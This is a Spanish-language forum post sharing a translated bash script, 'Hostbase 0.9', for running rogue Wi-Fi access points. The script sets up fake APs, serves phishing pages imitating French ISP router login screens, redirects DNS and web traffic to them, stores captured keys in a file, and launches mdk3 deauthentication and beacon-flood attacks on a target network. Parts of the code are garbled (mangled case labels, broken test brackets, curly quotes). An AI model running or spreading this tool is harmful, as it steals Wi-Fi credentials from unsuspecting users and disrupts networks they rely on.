salu2
la version sencilla como dice koala la version en ingles
en mi corto conocimiento traducido al español …echadle un ojo fijo que vereis fallos y demas …pero ami me parece que va
lastima que tira de apache y wifislax parece que se lleva mal …a ver que hago pa mi :lol:
[code]#!/bin/bash
Hostbase 0.9 By Koala
Script destiné a des tests sur les réseaux wifi
Enjoy
En cas de modification du script pour la conf de hostapd ou des options de airbase, ne pas oublier de laisser un espace derrière l’essid (sinon bash ne traduira pas l’espace meme si vous le rentrez)exemple: "{essid} " et un espace derrière {essid} pour hostapd.
Attention a toute modification sur la partie d’écriture sur les fichiers EOF, un simple espace ou saut a la ligne peut entrainer des erreurs
Fake page freewifi et freebox a voir
f_Banniere(){
echo -e “\e[1;33m Hostbase version 0.9 (released November 2016) By Koala alias Flow\e[0m”
echo -e " |\ ) ( "
echo -e " | _ ) ( "
echo -e " | @ \ ) ( "
echo -e "~~~~~~~~~~~~~~~~~| ↔ / ) ( "
echo -e " |\ ) | ( "
echo -e " | | | "
echo -e "(|)__(|) | __________________________________"
echo -e “\e[1;34m Rogues AP script, hostapd and airbase power.\e[0m”
echo
echo -e “\e[1;31m For a better visibility put in full screen.\e[0m”
echo
}
##################################################
f_checkexit(){
echo -e "\n\e[1;34m[*]\e[0m Clean up... WAIT!\n"
sleep 2;
echo -e "\n\e[1;34m[*]\e[0m $menu_lenguaje_checkexit1 wait\n"
sudo sysctl net.ipv4.ip_forward=0
sleep 2;
airmon-ng stop ${moniteurmode} &> /dev/null
sleep 4;
airmon-ng stop ${intmoniteur} &> /dev/null
sleep 4;
rfkill unblock all
ifconfig ${monmode} up
if [ -f "/tmp/hostapd.pid" ];then
killall hostapd
kill `cat /tmp/hostapdclirefresh.pid`
killall dnsspoof
cd /tmp/
rm -rf *.pid
rm -rf /root/hostapd.conf
cd /var/www/
rm -rf *
sleep 1;
echo -e "\n\e[1;34m[*]\e[0m $menu_lenguaje_checkexit2...\n"
sleep 2;
for PID in $( ps -e | grep xterm | awk '{print $1;}' ); do kill ${PID} 2>&-; done
else
echo -e "\n\e[1;34m[*]\e[0m $menu_lenguaje_checkexit2...\n"
sleep 2;
for PID in $( ps -e | grep xterm | awk '{print $1;}' ); do kill ${PID} 2>&-; done
fi
exit 2> /dev/null
}
##################################################
f_wlan(){
echo -e "\e[1;34m[]\e[0m $menu_lenguaje_wlan1…"
sleep 2;
airmon-ng check kill
sleep 5;
ifconfig -a
unset monmode
while [ -z “${monmode}” ]; do read -p "$menu_lenguaje_wlan2 (ex. wlan0 wlan1 wlp…): " monmode; done
if echo ${monmode} | egrep '^wlan|wlp*’ ; then
airmon-ng start ${monmode}
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_wlan3 !\n”
sleep 4;
f_wlan
fi
unset moniteurmode
while [ -z “${moniteurmode}” ]; do read -p "$menu_lenguaje_wlan4, (ex: wlan0mon, mon0 etc…): " moniteurmode; done
}
##################################################
f_floodinterface(){
ifconfig -a
unset int2
while -z “${int2}” ]; do read -p "$menu_lenguaje_flood_interface1: " int2; done
if echo ${int2} | egrep ‘^wlan*|wlp*’ ; then
echo -e “\e[1;34m[*]\e[0m $menu_lenguaje_flood_interface2…”
airmon-ng start ${int2}
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_flood_interface3 !\n”
sleep 4;
f_floodinterface
fi
ifconfig
unset intmoniteur
while [ -z “${intmoniteur}” ]; do read -p "$menu_lenguaje_flood_interface4: " intmoniteur; done
}
##################################################
f_config(){
clear
f_Banniere
echo “1. $menu_lenguaje_config1”
echo “2. $menu_lenguaje_config2”
echo “3. $menu_lenguaje_config3”
echo
read -p "Choice: " prereqschoice
case ${prereqschoice} in
- f_nanohostapd ;;
- f_dhcp ;;
- f_mainmenu ;;
*) f_config ;;
esac
}
##################################################
f_nanohostapd(){
nano /root/hostapd.conf
f_config
}
f_dhcp(){
nano /etc/dhcp/dhcpd.conf
f_config
}
##################################################
f_rogueap(){
clear
f_Banniere
echo “1. $menu_lenguaje_rogue_ap1”
echo “2. $menu_lenguaje_rogue_ap2”
echo “3. $menu_lenguaje_rogue_ap3”
echo “4. $menu_lenguaje_rogue_ap4”
echo “5. $menu_lenguaje_rogue_ap5”
echo
read -p "Choix: " fapchoix
case ${fapchoix} in
- f_opnairbaserogue ;;
- f_hostapdwps ;;
- f_interface ;;
- f_confperso ;;
- f_mainmenu ;;
*) f_rogueap ;;
esac
}
##################################################
f_opnairbaserogue(){
f_wlan
rm -rf /etc/dhcp/dhcpd.conf
touch /etc/dhcp/dhcpd.conf
unset essid
while -z “${essid}” ]; do read -p "$menu_lenguaje_opnairbaserogue1: " essid; done
unset channel
while -z “${channel}” ]; do read -p "$menu_lenguaje_opnairbaserogue2: " channel; done
if (($channel >= 1 && $channel <= 13)); then
echo -e "\e[1;34m[*]\e[0m OK"
sleep 2;
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_opnairbaserogue3\n”
sleep 4;
f_opnairbaserogue
fi
unset fakepagechoix
while [ -z “${fakepagechoix}” ]; do read -p "Router to phish? (ex. livebox sfr bbox ou sfrwifi): " fakepagechoix; done
if “${fakepagechoix}” = ‘livebox’ ] || “${fakepagechoix}” = ‘sfr’ ] || “${fakepagechoix}” = ‘bbox’ ] || “${fakepagechoix}” = ‘sfrwifi’ ]; then
mkdir /root/apachebackup
cp -R /var/www/* /root/apachebackup/
sleep 2;
cd /var/www/
rm -rf *
cp -R /etc/${fakepagechoix}/* /var/www/
sleep 2;
echo -e “\e[1;34m[*]\e[0m OK, Starting airbase”
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e airbase-ng -P -C 30 -c “${channel}” -e "${essid} " “${moniteurmode}” &> /dev/null &
sleep 5;
f_dhcpconf
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_opnairbaserogue4!\n”
sleep 4;
f_opnairbaserogue
fi
}
##################################################
f_dhcpconf(){
echo -e “\e[1;34m[]\e[0m Configuring dhcp on at0…"
cat <<-EOF > /etc/dhcp/dhcpd.conf
option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}
EOF
sleep 1;
echo -e "\e[1;34m[]\e[0m Redirect with iptables on at0…”
ifconfig at0 up
sudo sysctl net.ipv4.ip_forward=1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sleep 2;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80
echo > ‘/var/lib/dhcp/dhcpd.leases’
echo -e “\e[1;34m[]\e[0m Starting dhcp"
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e dhcpd -d /etc/dhcpd.conf &> /dev/null &
sleep 3;
echo -e "\e[1;34m[]\e[0m 0m Starting spoofing trafic…”
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &
sudo chown -R root:www-data /var/www/*
sleep 1;
find /var/www -type f -exec sudo chmod 777 {} ;
sudo chown -R root:www-data /var/www/cle.txt # Ajout de cette ligne qui pointe sur le fichier en plus car sinon le fichier cle.txt reste dans le groupe root malgré le sudo chown précédent
sudo chmod 764 /var/www/cle.txt
sudo service apache2 restart
sleep 4;
f_mainmenu
}
##################################################
f_dhcpconfhtpd(){
cat <<-EOF > /etc/dhcp/dhcpd.conf
option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
interface ${monmode};
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}
EOF
sleep 1;
ifconfig ${monmode} up
sudo sysctl net.ipv4.ip_forward=1
sudo ifconfig ${monmode} 10.0.0.1 netmask 255.255.255.0
sleep 1;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sleep 2;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80
sleep 2;
echo > ‘/var/lib/dhcp/dhcpd.leases’
echo -e “\e[1;34m[]\e[0m Starting dhcp"
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e dhcpd -d /etc/dhcpd.conf &> /dev/null &
sleep 3;
echo -e "\e[1;34m[]\e[0m Starting spoofing trafic…”
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e dnsspoof -i “${monmode}” -f /root/dns.txt &> /dev/null &
sudo chown -R root:www-data /var/www/*
sleep 1;
find /var/www -type f -exec sudo chmod 777 {} ;
sudo chown -R root:www-data /var/www/cle.txt # Ajout de cette ligne qui pointe sur le fichier en plus car sinon le fichier cle.txt reste dans le groupe root malgré le sudo chown précédent
sudo chmod 764 /var/www/cle.txt
sudo service apache2 restart
sleep 4;
f_mainmenu
}
##################################################
f_hostapdwps(){
echo -e "\e[1;34m[]\e[0m Hostapd"
rm -rf /etc/dhcp/dhcpd.conf
touch /etc/dhcp/dhcpd.conf
touch /root/hostapd.conf
ifconfig -a
unset monmode
while [ -z “${monmode}” ]; do read -p "$menu_lenguaje_hostapdwps1 (ex. wlan0 wlan1 wlp…): " monmode; done
if echo ${monmode} | egrep '^wlan|wlp*’ ; then
ifconfig ${monmode} up
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_hostapdwps2 !\n”
sleep 4;
f_hostapdwps
fi
unset essid
while [ -z “${essid}” ]; do read -p "$menu_lenguaje_hostapdwps3: " essid; done
unset channel
while -z “${channel}” ]; do read -p "$menu_lenguaje_hostapdwps4: " channel; done
if (($channel >= 1 && $channel <= 13)); then
echo -e "\e[1;34m[*]\e[0m OK"
sleep 2;
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_hostapdwps5!\n”
sleep 5;
f_hostapdwps
fi
unset fakepagechoix
while [ -z “${fakepagechoix}” ]; do read -p "Router to phish? (ex. livebox sfr bbox ou sfrwifi): " fakepagechoix; done
if “${fakepagechoix}” = ‘livebox’ ] || “${fakepagechoix}” = ‘sfr’ ] || “${fakepagechoix}” = ‘bbox’ ] || “${fakepagechoix}” = ‘sfrwifi’ ]; then
mkdir /root/apachebackup
cp -R /var/www/* /root/apachebackup/
sleep 3;
cd /var/www/
rm -rf *
cp -R /etc/${fakepagechoix}/* /var/www/
sleep 2;
touch /root/hostapd.conf
sleep 1;
echo -e “\e[1;34m[*]\e[0m OK”
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_hostapdwps6!\n”
sleep 4;
f_hostapdwps
fi
cat <<-EOF > /root/hostapd.conf
interface=${monmode}
driver=nl80211
ssid=${essid}
ieee8021x=1
wpa=2
hw_mode=g
ieee80211n=1
channel=${channel}
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_passphrase=12345678
ctrl_interface=/var/run/hostapd
eap_server=1
wps_state=2
ap_setup_locked=0
uuid=87654321-9abc-def0-1234-56789abc0000
wps_pin_requests=/var/run/hostapd.pin-req
device_name=Wireless AP
manufacturer=Company
model_name=WAP
model_number=123
serial_number=12345
device_type=6-0050F204-1
os_version=01020300
config_methods=label display push_button keypad
pbc_in_m1=1
friendly_name=WPS Access Point
EOF
sleep 2;
echo -e “\e[1;34m[]\e[0m Starting hostapd, wait…"
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e hostapd /root/hostapd.conf &> /dev/null &
echo $! >/tmp/hostapd.pid
sleep 5;
echo -e "\e[1;34m[]\e[0m Starting hostapd_cli in background, wait…”
while : ; do
xterm -e hostapd_cli wps_pbc ; sleep 120 ; done &
echo $! >/tmp/hostapdclirefresh.pid
f_dhcpconfhtpd
}
##################################################
f_ddos(){
clear
f_Banniere
echo “1. Ddos mdk3”
echo “2. Previous menu”
echo
read -p "Choix: " ddoschoix
case ${ddoschoix} in
- f_interface ;;
- f_mainmenu ;;
*) f_ddos ;;
esac
}
##################################################
f_interface(){
f_floodinterface
unset ESSID
while [ -z “${ESSID}” ]; do read -p "$menu_lenguaje_f_interface1: " ESSID; done
echo -e “\e[1;34m[*]\e[0m OK”
unset canal
while [ -z “${canal}” ]; do read -p "$menu_lenguaje_f_interface2: " canal; done
if (($canal >= 1 && $canal <= 13)); then
echo -e "\e[1;34m[*]\e[0m OK"
sleep 2;
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_f_interface3!\n”
sleep 5;
f_interface
fi
read -ep " $menu_lenguaje_f_interface4 : " BSSID
echo " "
while !(echo $BSSID | tr a-f A-F | egrep -q “^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$”)
do
echo -e " $rojo Erreur : BSSID not correct $colorbase"
echo " "
read -ep " $menu_lenguaje_f_interface4 : " BSSID
echo " "
done
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e mdk3 ${intmoniteur} a -m -i “${BSSID}” &> /dev/null &
sleep 3;
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e mdk3 ${intmoniteur} b -n “${ESSID}” &> /dev/null &
sleep 3;
f_mainmenu
}
##################################################
f_confperso(){
echo -e “\e[1;34m[*]\e[0m $menu_lenguaje_f_confperso1”
sleep 2;
echo -e "\e[1;34m[]\e[0m $menu_lenguaje_f_confperso2"
ifconfig -a
unset monmode
while [ -z “${monmode}” ]; do read -p "$menu_lenguaje_f_confperso3 (ex. wlan0 wlan1 wlp…): " monmode; done
if echo ${monmode} | egrep '^wlan|wlp*’ ; then
ifconfig ${monmode} up
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_hostapdwps2 !\n”
sleep 4;
f_confperso
fi
unset passerelle
while [ -z “${passerelle}” ]; do read -p "$menu_lenguaje_f_confperso4: " passerelle;
if ! ${passerelle} =~ ^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$ ]]; then ${passerelle}=; fi
done
unset fakepagechoix
while -z “${fakepagechoix}” ]; do read -p "Router to phish? (ex. livebox sfr bbox ou sfrwifi): " fakepagechoix; done
if “${fakepagechoix}” = ‘livebox’ ] || “${fakepagechoix}” = ‘sfr’ ] || “${fakepagechoix}” = ‘bbox’ ] || “${fakepagechoix}” = ‘sfrwifi’ ]; then
mkdir /root/apachebackup
cp -R /var/www/* /root/apachebackup/
sleep 2;
cd /var/www/
rm -rf *
cp -R /etc/${fakepagechoix}/* /var/www/
sleep 2;
echo -e “\e[1;34m[*]\e[0m OK”
else
echo -e “\n\e[1;31m[-]\e[0m $menu_lenguaje_hostapdwps6 !\n”
sleep 4;
f_confperso
fi
echo -e "\e[1;34m[*]\e[0m Starting hostapd, wait..."
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e hostapd /root/hostapd.conf &> /dev/null &
echo $! >/tmp/hostapd.pid
sleep 5;
ifconfig ${monmode} ${passerelle} netmask 255.255.255.0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sleep 2;
route add -net ${passerelle} netmask 255.255.255.0 gw ${passerelle}
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ${passerelle}
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to ${passerelle}:80
echo > ‘/var/lib/dhcp/dhcpd.leases’
echo
sudo sysctl net.ipv4.ip_forward=1
echo -e “\e[1;34m[]\e[0m Starting dhcp…"
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e dhcpd -d /etc/dhcpd.conf &> /dev/null &
sleep 3;
echo -e "\e[1;34m[]\e[0m Starting spoofing trafic.”
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e dnsspoof -i “${monmode}” -f /root/dns.txt &> /dev/null &
sudo chown -R root:www-data /var/www/*
sleep 1;
find /var/www -type f -exec sudo chmod 777 {} ;
sudo chown -R root:www-data /var/www/cle.txt
sudo chmod 764 /var/www/cle.txt
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e sudo service apache2 restart &> /dev/null &
sleep 4;
xterm -hold -bg ‘#000000’ -fg ‘#3A94FF’ -e hostapd /root/hostapd.conf &> /dev/null &
echo $! >/tmp/hostapd.pid
sleep 5;
echo -e “\e[1;34m[*]\e[0m Starting hostapd_cli in background…”
while : ; do
xterm -e hostapd_cli wps_pbc ; sleep 120 ; done &
echo $! >/tmp/hostapdclirefresh.pid
f_mainmenu
}
##################################################
f_scan(){
echo -e “\e[1;34m[]\e[0m OK, $menu_lenguaje_f_scan1… WAIT"
if [ -f “/etc/init/network-manager.conf” ];then
systemctl stop NetworkManager.service
systemctl disable NetworkManager.service
sleep 4;
else
service wicd stop
sleep 5;
fi
f_wlan
echo -e "\e[1;34m[]\e[0m OK, $menu_lenguaje_f_scan2”
sleep 5;
airodump-ng ${moniteurmode}
airmon-ng stop ${moniteurmode}
sleep 5;
ifconfig ${monmode} up
f_mainmenu
}
##################################################
f_stop(){
echo -e “\e[1;34m[*]\e[0m $menu_lenguaje_f_stop1…”
sleep 2;
airmon-ng stop ${intmoniteur}
sleep 5;
airmon-ng stop ${moniteurmode}
sleep 5;
ifconfig ${monmode} up
if [ -f "/tmp/hostapd.pid" ];then
killall hostapd
kill 9 `cat /tmp/hostapdclirefresh.pid`
killall dnsspoof
cd /tmp/
rm -rf *.pid
rm -rf /root/hostapd.conf
cd /var/www/
rm -rf *
sleep 1;
killall xterm
echo -e "\n\e[1;34m[*]\e[0m $menu_lenguaje_f_stop2...\n"
sleep 2;
f_mainmenu
else
killall xterm
echo -e "\n\e[1;34m[*]\e[0m $menu_lenguaje_f_stop2...\n"
sleep 2;
f_mainmenu
fi
}
##################################################
f_mainmenu() {
while true; do
f_Banniere
echo "Select your language"
echo " "
echo -e " "$blue"1)"$transparent" Español "
echo -e " "$blue"2)"$transparent" English "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) f_spain; break ;;
2 ) f_english; break ;;
* ) echo "Unknown option. Please choose again"; f_mainmenu ;;
esac
done
}
f_english() {
menu_lenguaje1=“Config files”
menu_lenguaje2=“Fake AP attack”
menu_lenguaje3=“Ddos attack”
menu_lenguaje4=“Passive scan (use FULL SCREEN)”
menu_lenguaje5=“Stop alive attack (if there one)”
menu_lenguaje6=“Quit”
###############
menu_lenguaje_config1=“Edit hostapd.conf for advanced users only”
menu_lenguaje_config2=“Editer dhcpd.conf for advanced users only”
menu_lenguaje_config3=“Previous menu”
####################
menu_lenguaje_rogue_ap1=“Open rogue AP with airbase”
menu_lenguaje_rogue_ap2=“Encrypted rogue AP with hostapd”
menu_lenguaje_rogue_ap3=“Ddos attack”
menu_lenguaje_rogue_ap4=“Use your own hostapd.conf (see config files)”
menu_lenguaje_rogue_ap5=“Previous menu”
###################
menu_lenguaje_checkexit1=“Disabling monitor mode…”
menu_lenguaje_checkexit2=“Clean up terminated see you later”
###################
menu_lenguaje_wlan1=“Stoping services wich can cause problem with airbase or hostapd”
menu_lenguaje_wlan2=“Interface for attack”
menu_lenguaje_wlan3=“ERREUR: name not correct”
menu_lenguaje_wlan4=“Name of the wireless card in monitor mode”
###################
menu_lenguaje_flood_interface1=“Choose your second wireless card”
menu_lenguaje_flood_interface2=“Activating monitor mode”
menu_lenguaje_flood_interface3=“ERREUR: name not correct”
menu_lenguaje_flood_interface4=“Name of the second wirless card in moniteur”
###################
menu_lenguaje_opnairbaserogue1=“Name of your fake AP LET A SPACE after the last letter”
menu_lenguaje_opnairbaserogue2=“Channel (must be different of the real network)”
menu_lenguaje_opnairbaserogue3=“ERREUR: chanel incorrect, must be between 1 and 13, all parameters must be correct”
menu_lenguaje_opnairbaserogue4=“ERREUR: introduzca livebox o sfr o bbox o sfrwifi!”
###################
menu_lenguaje_hostapdwps1=“Wireless card for attack”
menu_lenguaje_hostapdwps2=“ERROR: invalid name”
menu_lenguaje_hostapdwps3=“Name of your fake AP LET A SPACE after the last letter”
menu_lenguaje_hostapdwps4=“Channel of the network”
menu_lenguaje_hostapdwps5=“ERREUR: chanel incorrect, must be between 1 and 13, all parameters must be correct”
menu_lenguaje_hostapdwps6=“ERREUR: introduzca livebox o sfr o bbox o sfrwifi!”
##############
menu_lenguaje_f_interface1=“ESSID of target network”
menu_lenguaje_f_interface2=“Channel of target network”
menu_lenguaje_f_interface3=“ERREUR: invalid channel, must be between 1 and 13”
menu_lenguaje_f_interface4=“BSSID of target network”
menu_lenguaje_f_interface5=“BSSID of target network”
##############
menu_lenguaje_f_scan1=“scaning for service wich can cause problem”
menu_lenguaje_f_scan2=“Scan will start, push ctrl+c at any time to come back on the main menu”
#############
menu_lenguaje_f_stop1=“Stopping your previous attack”
menu_lenguaje_f_stop2=“Attack stoped”
f_mainmenu2
}
f_spain() {
menu_lenguaje1=“Archivos de configuración”
menu_lenguaje2=“Fake AP ataquar”
menu_lenguaje3=“Ddos attack”
menu_lenguaje4=“Escaneo pasivo (use FULL SCREEN)”
menu_lenguaje5=“Detener el ataque vivo (si hay uno)”
menu_lenguaje6=“Salir”
################
menu_lenguaje_config1=“Editar hostapd.conf sólo para usuarios avanzados”
menu_lenguaje_config2=“Editar dhcpd.conf sólo para usuarios avanzados”
menu_lenguaje_config3=“Menu Amterior”
################
menu_lenguaje_rogue_ap1=“Abrir el rogue AP con airbase”
menu_lenguaje_rogue_ap2=“Encriptado rogue AP con hostapd”
menu_lenguaje_rogue_ap3=“Ddos ataque”
menu_lenguaje_rogue_ap4=“Utilice su propio hostapd.conf (consulte los archivos de configuracion)”
menu_lenguaje_rogue_ap5=“Menu Anterior”
################
menu_lenguaje_checkexit1=“Desactivación del modo monitor …”
menu_lenguaje_checkexit2=“Limpiar terminado ver más tarde”
################
menu_lenguaje_wlan1=“Detención de servicios que pueden causar problemas con airbase o hostapd”
menu_lenguaje_wlan2=“Interfaz para el ataque”
menu_lenguaje_wlan3=“Error: nombre incorrecto”
menu_lenguaje_wlan4=“Nombre de la tarjeta inalámbrica en modo monitor”
###############
menu_lenguaje_flood_interface1=“Elige tu segunda tarjeta inalámbrica”
menu_lenguaje_flood_interface2=“Activación del modo monitor”
menu_lenguaje_flood_interface3=“Error: nombre incorrecto”
menu_lenguaje_flood_interface4=“Nombre de la segunda tarjeta wireless en modo monitor”
##############
menu_lenguaje_opnairbaserogue1=“Nombre de su AP falso DEJE UN ESPACIO después de la última letra”
menu_lenguaje_opnairbaserogue2=“Canal (debe ser diferente de la red real)”
menu_lenguaje_opnairbaserogue3=“ERROR: canal incorrecto, debe estar entre 1 y 13, todos los parámetros deben ser correctos”
menu_lenguaje_opnairbaserogue4=“ERROR: introduzca livebox o sfr o bbox o sfrwifi o sus fake ap propios”
##############
menu_lenguaje_hostapdwps1=“Tarjeta inalámbrica para ataque”
menu_lenguaje_hostapdwps2=“ERROR:nombre invalido”
menu_lenguaje_hostapdwps3=“Nombre de su AP falso DEJE UN ESPACIO después de la última letra”
menu_lenguaje_hostapdwps4=“Canal de la red”
menu_lenguaje_hostapdwps5=“ERROR: chanel incorrecto, debe estar entre 1 y 13, todos los parámetros deben ser correctos”
menu_lenguaje_hostapdwps6=“ERROR: introduzca livebox o sfr o bbox o sfrwifi o sus fake ap propios”
##############
menu_lenguaje_f_interface1=“ESSID de la red de destino”
menu_lenguaje_f_interface2=“Canal de la red de destino”
menu_lenguaje_f_interface3=“ERREUR: invalid channel, must be between 1 and 13”
menu_lenguaje_f_interface4=“BSSID de la red de destino”
menu_lenguaje_f_interface5=“BSSID de la red de destino”
##############
menu_lenguaje_f_confperso1=“Usted elige su propia configuración”
menu_lenguaje_f_confperso2=“Hostapd configuracion personalizada conf”
menu_lenguaje_f_confperso3=“Tarjeta inalámbrica para ataque”
menu_lenguaje_f_confperso4=“Puerta de enlace de tu falso AP”
##############
menu_lenguaje_f_scan1=“Búsqueda de servicio que puede causar problemas”
menu_lenguaje_f_scan2=“Se iniciará la exploración, pulse ctrl + c en cualquier momento para volver al menú principal”
#############
menu_lenguaje_f_stop1=“Detener el ataque anterior”
menu_lenguaje_f_stop2=“Ataque detenido”
f_mainmenu2
}
f_mainmenu2(){
clear
f_Banniere
echo “1. $menu_lenguaje1”
echo “2. $menu_lenguaje2”
echo “3. $menu_lenguaje3”
echo “4. $menu_lenguaje4”
echo “5. $menu_lenguaje5”
echo “6. $menu_lenguaje6”
echo
read -p "Choix: " menuchoix
case ${menuchoix} in
- unset clean; f_config ;;
- unset clean; f_rogueap ;;
- unset clean; f_ddos ;;
- unset clean; f_scan ;;
- unset clean; f_stop ;;
- f_checkexit ;;
*) f_mainmenu ;;
esac
}
run as root
if [ “$(id -u)” != “0” ]; then
echo -e “\e[1;31m[!]\e[0m Sorry but this script need admin permission” 1>&2
exit 1
else
clean=1
f_mainmenu
fi
[/code]
fijarse al final es donde esta las cosas pero bueno en realidad es todo el script con tema de traduccion
¿que hago lo dejo asi en code para que le eche un ojo o lo subo a la red : o creo fork en ghitub y ya ven ustedes yo ghitub y sus ramas no las quiero tengo miedo joder proyecto al subir archivos?
otra cosa esta para ubuntu el instaler y kali
a ver que puedo hacer pa meterselo a wifislax y autoamatizar no tener que hacerlo a mano pero …a ver